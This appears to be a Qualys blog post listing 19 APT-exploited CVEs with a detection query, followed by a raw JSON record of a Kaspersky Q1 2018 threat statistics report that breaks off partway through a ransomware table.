[A recent report](<https://www.darkreading.com/threat-intelligence/20-vulnerabilities-to-prioritize-patching-before-2020/d/d-id/1336691>) identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.
The list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.
**No.** | **CVE** | **Products Affected by CVE** | **CVSS Score (NVD)** | **Examples of Threat Actors**
---|---|---|---|---
**1** | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia)
**2** | CVE-2018-8174 | Microsoft Windows | 7.5 | Silent Group (Russia), Dark Hotel APT (North Korea)
**3** | CVE-2017-0199 | Microsoft Office, Windows | 7.8 | APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Gorgon Group (Pakistan), Gaza Cybergang (Iran)
**4** | CVE-2018-4878 | Adobe Flash Player, Red Hat Enterprise Linux | 9.8 | APT37 (North Korea), Lazarus Group (North Korea)
**5** | CVE-2017-10271 | Oracle WebLogic Server | 7.5 | Rocke Gang (Chinese Cybercrime)
**6** | CVE-2019-0708 | Microsoft Windows | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru)
**7** | CVE-2017-5638 | Apache Struts | 10 | Lazarus Group (North Korea)
**8** | CVE-2017-5715 | ARM, Intel | 5.6 | Unknown
**9** | CVE-2017-8759 | Microsoft .net Framework | 7.8 | APT40 (China), Cobalt Group (Spain, Ukraine), APT10 (China)
**10** | CVE-2018-20250 | RARLAB WinRAR | 7.8 | APT32 (Vietnam), APT33 (Iran), APT-C-27 (Iran), Lazarus Group (North Korea), MuddyWater APT (Iran)
**11** | CVE-2018-7600 | Debian, Drupal | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru), Sea Turtle (Iran)
**12** | CVE-2018-10561 | DASAN Networks | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru)
**13** | CVE-2012-0158 | Microsoft | N/A; 9.3* | APT28 (Russia), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Lotus Blossom (China), Goblin Panda (China), Gorgon Group (Pakistan), APT40 (China)
**14** | CVE-2017-8570 | Microsoft Office | 7.8 | APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT23 (China)
**15** | CVE-2018-0802 | Microsoft Office | 7.8 | Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Cloud Atlas (Unknown), Cobalt Group (Spain, Ukraine), Goblin Panda (China), APT23 (China), APT27 (China), Rancor Group (China), Temp.Trident (China)
**16** | CVE-2017-0143 | Microsoft SMB | 8.1 | APT3 (China), Calypso (China)
**17** | CVE-2018-12130 | Fedora | 5.6 | Iron Tiger (China), APT3 (China), Calypso (China)
**18** | CVE-2019-2725 | Oracle WebLogic Server | 9.8 | Panda (China)
**19** | CVE-2019-3396 | Atlassian Confluence | 9.8 | APT41 (China), Rocke Gang (Chinese Cybercrime)
* according to [cvedetails.com](<http://cvedetails.com/>)
### Detecting the Top 19 CVEs
Qualys has detections (QIDs) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that cover authenticated and remotely detected vulnerabilities supported by Qualys scanners and [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).
To return a list of all impacted hosts, use the following QQL query within the VM Dashboard:
vulnerabilities.vulnerability.cveIds:[CVE-2017-11882, CVE-2018-8174, CVE-2017-0199, CVE-2018-4878, CVE-2017-10271, CVE-2019-0708, CVE-2017-5638, CVE-2017-5715, CVE-2017-8759, CVE-2018-20250, CVE-2018-7600, CVE-2018-10561, CVE-2012-0158, CVE-2017-8570, CVE-2018-0802, CVE-2017-0143, CVE-2018-12130, CVE-2019-2725, CVE-2019-3396]
You can [import the following dashboard to track all 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>) as shown in the template below:
[](<https://discussions.qualys.com/docs/DOC-7032>)
### Alerts
The Qualys Cloud Platform enables you to continuously monitor for vulnerabilities and misconfigurations and get alerted for your most critical assets.
See how to set up [notifications for new and updated QIDs](<https://www.qualys.com/docs/version/8.21/qualys-vulnerability-notification.pdf>).
### Tracking Per-Year Environment Impact and Remediation
The Qualys visualization team has included a Per-Year Environment Insight View Dashboard for easy tracking and remediation. This dashboard has been included in release 2.42 and can be found within the dashboard templates library. It will automatically show your systems whether scanned internally, externally or on remote mobile computers with the groundbreaking Qualys Cloud Agent.
This Per-Year Environment Insight View Dashboard will display data per year based on First Found date, followed by Vulnerability Status, Severity, Compliance, Real-Time Threat Intelligence (RTI)s from [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>), and Vulnerability Published Dates, allowing for an easy glance across your environment.
### Get Started Now
To start detecting and remediating these vulnerabilities now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).
Visit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download other dashboards created by your SMEs and Product Management team and import them into your subscription for further data insights.
{"securelist": [{"lastseen": "2018-05-15T21:13:49", "description": "\n\n## Q1 figures\n\nAccording to KSN: \n\n * Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.\n * 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.\n * Ransomware attacks were registered on the computers of 179,934 unique users.\n * Our File Anti-Virus logged 187,597,494 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,322,578 malicious installation packages\n * 18,912 installation packages for mobile banking Trojans\n * 8,787 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Q1 events\n\nIn Q1 2018, DNS-hijacking, a new in-the-wild method for spreading mobile malware on Android devices, was identified. As a result of hacked routers and modified DNS settings, users were redirected to IP addresses belonging to the cybercriminals, where they were prompted to download malware disguised, for example, as browser updates. That is how the Korean banking Trojan Wroba was [distributed](<https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171226/180511-it-threats-q1-18-statistics-1.png>)\n\n_This malicious resource shows a fake window while displaying the legitimate site in the address bar_\n\nIt wasn't a [drive-by-download](<https://securelist.com/threats/drive-by-attack-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) case, since the success of the attack largely depended on actions by the victim, such as installing and running the Trojan. But it's interesting to note that some devices (routers) were used to attack other devices (smartphones), all sprinkled with social engineering to make it more effective.\n\nHowever, a far greater splash in Q1 was caused by the creators of a seemingly legitimate app called GetContact.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171508/180511-it-threats-q1-18-statistics-21.png>)\n\nSome backstory to begin with. Various families and classes of malicious apps are known to gather data from infected devices: it could be a relatively harmless IMEI number, phone book contents, SMS correspondence, or even WhatsApp chats. All the above (and much more besides) is personal information that only the mobile phone owner should have control over. However, the creators of GetContact concocted a license agreement giving them the right to download the user's phone book to their servers and grant all their subscribers access to it. As a result, anyone could find out what name GetContact users had saved their phone number under, often with sad consequences. Let's hope that the app creators had the noble intention of [protecting users from telephone spam and fraudulent calls](<https://callerid.kaspersky.com/?lang=ru>), but simply chose the wrong means to do so.\n\n### Mobile threat statistics\n\nIn Q1 2018, Kaspersky Lab detected 1,322,578 malicious installation packages, down 11% against the previous quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171235/180511-it-threats-q1-18-statistics-4.png>)\n\n_Number of detected malicious installation packages, Q2 2017 \u2013 Q1 2018_\n\n#### Distribution of detected mobile apps by type\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171244/180511-it-threats-q1-18-statistics-5.png>)\n\n_Distribution of newly detected mobile apps by type, Q4 2017 and Q1 2018 _\n\nAmong all the threats detected in Q1 2018, the lion's share belonged to potentially unwanted RiskTool apps (49.3%); compared to the previous quarter, their share fell by 5.5%. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.\n\nSecond place was taken by Trojan-Dropper threats (21%), whose share doubled. Most detected files of this type came from the Trojan-Dropper.AndroidOS.Piom family.\n\nAdvertising apps, which ranked second in Q4 2017, dropped a place\u2014their share decreased by 8%, accounting for 11% of all detected threats.\n\nOn a separate note, Q1 saw a rise in the share of mobile banking threats. This was due to the mass distribution of Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### TOP 20 mobile malware\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n | Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 70.17 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.92 \n3 | Trojan.AndroidOS.Agent.rx | 5.55 \n4 | Trojan-Dropper.AndroidOS.Lezok.p | 5.23 \n5 | Trojan-Dropper.AndroidOS.Hqwar.ba | 2.95 \n6 | Trojan.AndroidOS.Triada.dl | 2.94 \n7 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.51 \n8 | Trojan.AndroidOS.Piom.rfw | 2.13 \n9 | Trojan-Dropper.AndroidOS.Lezok.t | 2.06 \n10 | Trojan.AndroidOS.Piom.pnl | 1.78 \n11 | Trojan-Dropper.AndroidOS.Agent.ii | 1.76 \n12 | Trojan-SMS.AndroidOS.FakeInst.ei | 1.64 \n13 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 \n14 | Trojan-Ransom.AndroidOS.Zebt.a | 1.48 \n15 | Trojan.AndroidOS.Piom.qmx | 1.47 \n16 | Trojan.AndroidOS.Dvmap.a | 1.40 \n17 | Trojan-SMS.AndroidOS.Agent.xk | 1.35 \n18 | Trojan.AndroidOS.Triada.snt | 1.24 \n19 | Trojan-Dropper.AndroidOS.Lezok.b | 1.22 \n20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.22 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nAs before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.17%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when the anti-virus databases lack data for detecting a piece of malware, but the cloud of the anti-virus company already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (12.92%). This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird was Trojan.AndroidOS.Agent.rx (5.55%). Operating in background mode, this Trojan's task is to covertly visit web pages as instructed by its C&C.\n\nFourth and fifth places went to the Trojan _matryoshkas_ Trojan-Dropper.AndroidOS.Lezok.p (5.2%) and Trojan-Dropper.AndroidOS.Hqwar.ba (2.95%), respectively. Note that in Q1 threats like Trojan-Dropper effectively owned the TOP 20, occupying eight positions in the rating. The main tasks of such droppers are to drop a payload on the victim, avoid detection by security software, and complicate the reverse engineering process. In the case of Lezok, an aggressive advertising app acts as the payload, while Hqwar can conceal a banking Trojan or ransomware.\n\nSixth place in the rating was taken by the unusual Trojan Triada.dl (2.94%) from the [Trojan.AndroidOS.Triada](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Triada/>) family of modular-designed malware, which we have written about many times. The Trojan was notable for its highly sophisticated attack vector: it modified the main system library libandroid_runtime.so so that malicious code started when any debugging output was written to the system event log. Devices with the modified library ended up on store shelves, thus ensuring that the infection began early. The capabilities of Triada.dl are almost limitless: it can be embedded in apps already installed and pinch data from them, and it can show the user fake data in \"clean\" apps.\n\nThe Trojan ransomware Trojan-Trojan-Ransom.AndroidOS.Zebt.a (1.48%) finished 14th. It features a quaint set of functions, including hiding the icon at startup and requesting device administrator rights to counteract deletion. Like other such mobile ransomware, the malware is distributed under the guise of a porn app.\n\nAnother interesting resident in the TOP 20 is Trojan-SMS.AndroidOS.Agent.xk (1.35%), which operates like the SMS Trojans of 2011. The malware displays a welcome screen offering various services, generally access to content. At the bottom in fine print it is written that the services are fee-based and subscription to them is via SMS.\n\n#### Geography of mobile threats\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171253/180511-it-threats-q1-18-statistics-6.png>)\n\n_Map of attempted infections using mobile malware in Q1 2018 (percentage of attacked users in the country)_\n\nTOP 10 countries by share of users attacked by mobile malware:\n\n | Country* | %** \n---|---|--- \n1 | China | 34.43 \n2 | Bangladesh | 27.53 \n3 | Nepal | 27.37 \n4 | Ivory Coast | 27.16 \n5 | Nigeria | 25.36 \n6 | Algeria | 24.13 \n7 | Tanzania | 23.61 \n8 | India | 23.27 \n9 | Indonesia | 22.01 \n10 | Kenya | 21.45 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q1 2018, China (34.43%) topped the list by share of mobile users attacked. Note that China is a regular fixture in the TOP 10 rating by number of attacked users: It came sixth in 2017, and fourth in 2016. As in 2017, second place was claimed by Bangladesh (27.53%). The biggest climber was Nepal (27.37%), rising from ninth place last year to third.\n\nRussia (8.18%) this quarter was down in 39th spot, behind Qatar (8.22%) and Vietnam (8.48%).\n\nThe safest countries (based on proportion of mobile users attacked) are Denmark (1.85%) and Japan (1%).\n\n#### Mobile banking Trojans\n\nIn the reporting period, we detected **18,912** installation packages for mobile banking Trojans, which is 1.3 times more than in Q4 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171304/180511-it-threats-q1-18-statistics-7.png>)\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q1 2018_\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.bj | 12.36 \n2 | Trojan-Banker.AndroidOS.Svpeng.q | 9.17 \n3 | Trojan-Banker.AndroidOS.Asacub.bk | 7.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.aj | 6.63 \n5 | Trojan-Banker.AndroidOS.Asacub.e | 5.93 \n6 | Trojan-Banker.AndroidOS.Hqwar.t | 5.38 \n7 | Trojan-Banker.AndroidOS.Faketoken.z | 5.15 \n8 | Trojan-Banker.AndroidOS.Svpeng.ai | 4.54 \n9 | Trojan-Banker.AndroidOS.Agent.di | 4.31 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 3.52 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nThe most popular mobile banking Trojan in Q1 was Asacub.bj (12.36%), nudging ahead of second-place Svpeng.q (9.17%). Both these Trojans use phishing windows to steal bank card and authentication data for online banking. They also steal money through SMS services, including mobile banking.\n\nNote that the TOP 10 mobile banking threats in Q1 is largely made up of members of the Asacub (4 out of 10) and Svpeng (3 out of 10) families. However, Trojan-Banker.AndroidOS.Faketoken.z also entered the list. This Trojan has extensive spy capabilities: it can install other apps, intercept incoming messages (or create them on command), make calls and USSD requests, and, of course, open links to phishing pages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171313/180511-it-threats-q1-18-statistics-8.png>)\n\n_Geography of mobile banking threats in Q1 2018 (percentage of attacked users)_\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans**\n\n | Country* | %** \n---|---|--- \n1 | Russia | 0.74 \n2 | USA | 0.65 \n3 | Tajikistan | 0.31 \n4 | Uzbekistan | 0.30 \n5 | China | 0.26 \n6 | Turkey | 0.22 \n7 | Ukraine | 0.22 \n8 | Kazakhstan | 0.22 \n9 | Poland | 0.17 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._\n\nThe Q1 2018 rating was much the same as the situation observed throughout 2017: Russia (0.74%) remained top.\n\nThe US (0.65%) and Tajikistan (0.31%) took silver and bronze, respectively. The most popular mobile banking Trojans in these countries were various modifications of the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/latest-version-of-svpeng-targets-users-in-us/63746/>) family, as well Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### Mobile ransomware Trojans\n\nIn Q1 2018, we detected **8,787** installation packages for mobile ransomware Trojans, which is just over half the amount seen in the previous quarter and 22 times less than in Q2 2017. This significant drop is largely because attackers began to make more use of droppers in an attempt to hinder detection and hide the payload. As a result, such malware is detected as a dropper (for example, from the Trojan-Dropper.AndroidOS.Hqwar family), even though it may contain mobile ransomware or a \"banker.\"\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171322/180511-it-threats-q1-18-statistics-9.png>)\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab (Q2 2017 \u2013 Q1 2018)_\n\nNote that despite the decline in their total number, ransomware Trojans remain a serious threat \u2014 technically they are now far more advanced and dangerous. For instance, Trojan-Trojan-Ransom.AndroidOS.Svpeng acquires device administrator rights and locks the smartphone screen with a PIN if an attempt is made to remove them. If no PIN is set (could also be a graphic, numeric, or biometric lock), the device is locked. In this case, the only way to restore the smartphone to working order is to reset the factory settings.\n\nThe most widespread mobile ransomware in Q1 was Trojan-Ransom.AndroidOS.Zebt.a \u2014 it was encountered by more than half of all users. In second place was Trojan-Ransom.AndroidOS.Fusob.h, having held pole position for a long time. The once popular Trojan-Ransom.AndroidOS.Svpeng.ab only managed fifth place, behind Trojan-Ransom.AndroidOS.Egat.d and Trojan-Ransom.AndroidOS.Small.snt. Incidentally, Egat.d is a pared-down version of Zebt.a, both have the same creators.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171331/180511-it-threats-q1-18-statistics-10.png>)\n\n_Geography of mobile ransomware Trojans in Q1 2018 (percentage of attacked users)_\n\nTOP 10 countries by share of users attacked by mobile ransomware Trojans:\n\n | Country* | %** \n---|---|--- \n1 | Kazakhstan | 0.99 \n2 | Italy | 0.64 \n3 | Ireland | 0.63 \n4 | Poland | 0.61 \n5 | Belgium | 0.56 \n6 | Austria | 0.38 \n7 | Romania | 0.37 \n8 | Hungary | 0.34 \n9 | Germany | 0.33 \n10 | Switzerland | 0.29 \n \n_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000) \n** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nFirst place in the TOP 10 again went to Kazakhstan (0.99%); the most active family in this country was Trojan-Ransom.AndroidOS.Small. Second came Italy (0.64%), where most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a, which is also the most popular mobile ransomware in third-place Ireland (0.63%).\n\n## Vulnerable apps used by cybercriminals\n\nIn Q1 2018, we observed some major changes in the distribution of exploits launched against users. The share of Microsoft Office exploits (47.15%) more than doubled compared with the average for 2017. This is also twice the quarterly score of the permanent leader in recent years \u2014 browser exploits (23.47%). The reason behind the sharp increase is clear: over the past year, so many different vulnerabilities have been found and exploited in Office applications, that it can only be compared to amount of Adobe Flash vulnerabilities found in the past. But lately the share of Flash exploits has been decreasing (2.57% in Q1), since Adobe and Microsoft are doing all they can to hinder the exploitation of Flash Player.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171341/180511-it-threats-q1-18-statistics-11.png>)\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2018_\n\nThe most frequently used vulnerability in Microsoft Office in Q1 was [CVE-2017-11882](<https://threats.kaspersky.com/en/vulnerability/KLA11139/>) \u2014 a stack overflow-type vulnerability in Equation Editor, a rather old component in the Office suite. Attacks using this vulnerability make up approximately one-sixth of all exploit-based attacks. This is presumably because CVE-2017-11882 exploitation is fairly reliable. Plus, the bytecode processed by Equation Editor allows the use of various obfuscations, which increases the chances of bypassing the protection and launching a successful attack (Kaspersky Lab's Equation file format parser easily handles all currently known obfuscations). Another vulnerability found in Equation Editor this quarter was CVE-2018-0802. It too is exploited, but less actively. The following exploits for logical vulnerabilities in Office found in 2017 were also encountered: CVE-2017-8570, CVE-2017-8759, CVE-2017-0199. But even their combined number of attacks does not rival CVE-2017-11882.\n\nAs for zero-day exploits in Q1, CVE-2018-4878 was reported by a South Korean CERT and several other sources in late January. This is an Adobe Flash vulnerability originally used in targeted attacks (supposedly by the Scarcruft group). At the end of the quarter, an exploit for it appeared in the widespread GreenFlash Sundown, Magnitude, and RIG exploit kits. In targeted attacks, a Flash object with the exploit was embedded in a Word document, while exploit kits distribute it via web pages.\n\nLarge-scale use of network exploits using vulnerabilities patched by the MS17-010 update (those that exploited [EternalBlue](<https://threats.kaspersky.com/en/vulnerability/KLA10977/>) and other vulnerabilities from the Shadow Brokers leak) also continued throughout the quarter. MS17-010 exploits account for more than 25% of all network attacks that we registered.\n\n## Malicious programs online (attacks via web resources)\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected. _\n\n### **Online threats in the financial sector**\n\n#### Q1 events\n\nIn early 2018, the owners of the Trojan Dridex were particularly active. Throughout its years-long existence, this malware has acquired a solid infrastructure. Today, its main line of activity is compromising credentials for online banking services with subsequent theft of funds from bank accounts. Its accomplice is fellow banking Trojan Emotet. Discovered in 2014, this malware also belongs to a new breed of banking Trojans developed from scratch. However, it was located on the same network infrastructure as Dridex, suggesting a close link between the two families. But now Emotet has lost its banking functions and is used by attackers as a spam bot and loader with Dridex as the payload. Early this year, it was reported that the encryptor BitPaymer (discovered last year) was developed by the same group behind [Dridex](<https://securelist.com/dridex-a-history-of-evolution/78531/>). As a result, the malware was rebranded FriedEx.\n\nQ1 saw the arrest of the head of the criminal group responsible for the Carbanak and Cobalt malware attacks, it was [reported by Europol](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>). Starting in 2013, the criminal group attacked more than 40 organizations, causing damage to the financial industry estimated at more than EUR 1 billion. The main attack vector was to penetrate the target organization's network by sending employees spear-phishing messages with malicious attachments. Having penetrated the internal network via the infected computers, the cybercriminals gained access to the ATM control servers, and through them to the ATMs themselves. Access to the infrastructure, servers, and ATMs allowed the cybercriminals to dispense cash without the use of bank cards, transfer money from the organisation to criminal accounts, and inflate bank balances with money mules being used to collect the proceeds.\n\n#### Financial threat statistics\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. As of Q1 2017, the statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q1 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 204,448 users.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171350/180511-it-threats-q1-18-statistics-12.png>)\n\n_Number of unique users attacked by financial malware, Q1 2018_\n\n##### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171359/180511-it-threats-q1-18-statistics-13.png>)\n\n \n**_Geography of banking malware attacks in Q1 2018 (percentage of attacked users)_**\n\n**TOP 10 countries by percentage of attacked users**\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Cameroon | 2.1 \n2 | Germany | 1.7 \n3 | South Korea | 1.5 \n4 | Libya | 1.5 \n5 | Togo | 1.5 \n6 | Armenia | 1.4 \n7 | Georgia | 1.4 \n8 | Moldova | 1.2 \n9 | Kyrgyzstan | 1.2 \n10 | Indonesia | 1.1 \n \n_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data. \nExcluded are countries with relatively few Kaspersky Lab' product users (under 10,000). \n** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 banking malware families\n\n**TOP 10 malware families used to attack online banking users in Q1 2018 (by share of attacked users):**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | Zbot | Trojan.Win32. Zbot | 28.0% | \n2 | Nymaim | Trojan.Win32. Nymaim | 20.3% | \n3 | Caphaw | Backdoor.Win32. Caphaw | 15.2% | \n4 | SpyEye | Backdoor.Win32. SpyEye | 11.9% | \n5 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 4.5% | \n6 | Emotet | Backdoor.Win32. Emotet | 2.4% | \n7 | Neurevt | Trojan.Win32. Neurevt | 2.3% | \n8 | Shiz | Backdoor.Win32. Shiz | 2.1% | \n9 | Gozi | Trojan.Win32. Gozi | 1.9% | \n10 | ZAccess | Backdoor.Win32. ZAccess | 1.3% | \n \n_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.__ \n** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2018, TrickBot departed the rating to be replaced by Emotet (2.4%), also known as _Heodo_. Trojan.Win32.Zbot (28%) and Trojan.Win32.Nymaim (20.3%) remain in the lead, while Trojan.Win32.Neurevt (2.3%), also known as Betabot, suffered a major slide. Meanwhile, Caphaw (15.2%) and NeutrinoPOS (4.5%) climbed significantly, as did their Q1 activity.\n\n### Cryptoware programs\n\n#### Q1 events\n\nQ1 2018 passed without major incidents or mass cryptoware epidemics. The highlight was perhaps the emergence and widespread occurrence of a new Trojan called [GandCrab](<https://threatpost.com/tag/gandcrab-ransomware/>). Notable features of the malware include:\n\n * Use of C&C servers in the .bit domain zone (this top-level domain is supported by an alternative decentralized DNS system based on Namecoin technology)\n * Ransom demand in the cryptocurrency Dash\n\nGandCrab was first detected in January. The cybercriminals behind it used spam emails and exploit kits to deliver the cryptoware to victim computers.\n\nThe RaaS (ransomware as a service) distribution model continues to attract malware developers. In February, for example, there appeared a new piece of ransomware called [Data Keeper](<https://securelist.ru/data-keeper-ransomware/88883/>), able to be distributed by any cybercriminal who so desired. Via a special resource on the Tor network, the creators of Data Keeper made it possible to generate executable files of the Trojan for subsequent distribution by \"affilate program\" participants. A dangerous feature of this malware is its ability to automatically propagate inside a local network. Despite this, Data Keeper did not achieve widespread distribution in Q1.\n\nOne notable success in the fight against cryptoware came from Europe: with the assistance of Kaspersky Lab, Belgian police [managed to locate and confiscate](<https://www.europol.europa.eu/newsroom/news/no-more-ransom-update-belgian-federal-police-releases-free-decryption-keys-for-cryakl-ransomware>) a server used by the masterminds behind the Trojan Cryakl. Following the operation, [Kaspersky Lab was given](<https://www.kaspersky.com/about/press-releases/2018_no-more-ransom-update>) several private RSA keys required to decrypt files encrypted with certain versions of the Trojan. As a result, we were able to develop a [tool](<https://support.kaspersky.com/viruses/disinfection/10556>) to assist victims.\n\n#### Number of new modifications\n\nIn Q1 2018, there appeared several new cryptors, but only one, GandCrab, was assigned a new family in our classification. The rest, which are not widely spread, continue to be detected with generic verdicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171409/180511-it-threats-q1-18-statistics-14.png>)\n\n_Number of new cryptoware modifications, Q2 2017 \u2013 Q1 2018_\n\nThe number of new modifications fell sharply against previous quarters. The trend indicates that cybercriminals using this type of malware are becoming less active.\n\n#### Number of users attacked by Trojan cryptors\n\nDuring the reporting period, Kaspersky Lab products blocked cryptoware attacks on the computers of 179,934 unique users. Despite fewer new Trojan modifications, the number of attacked users did not fall against Q3.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171418/180511-it-threats-q1-18-statistics-15.png>)\n\n_Number of unique users attacked by cryptors, Q1 2018_\n\n#### Geography of attacks\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171429/180511-it-threats-q1-18-statistics-16.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Uzbekistan | 1.12 \n2 | Angola | 1.11 \n3 | Vietnam | 1.04 \n4 | Venezuela | 0.95 \n5 | Indonesia | 0.95 \n6 | Pakistan | 0.93 \n7 | China | 0.87 \n8 | Azerbaijan | 0.75 \n9 | Bangladesh | 0.70 \n10 | Mongolia | 0.64 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThe makeup of the rating differs markedly from 2017. That said, most positions were again filled by Asian countries, while Europe did not have a single representative in the TOP 10 countries attacked by cryptors.\n\nDespite not making the TOP 10 last year, Uzbekistan (1.12%) and Angola (1.11%) came first and second. Vietnam (1.04%) moved from second to third, Indonesia (0.95%) from third to fifth, and China (0.87%) from fifth to seventh, while Venezuela (0.95%) climbed from eighth to fourth.\n\n**TOP 10 most widespread cryptor families**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 38.33 | \n2 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 4.07 | \n3 | Cerber | Trojan-Ransom.Win32.Zerber | 4.06 | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 2.99 | \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.77 | \n6 | Shade | 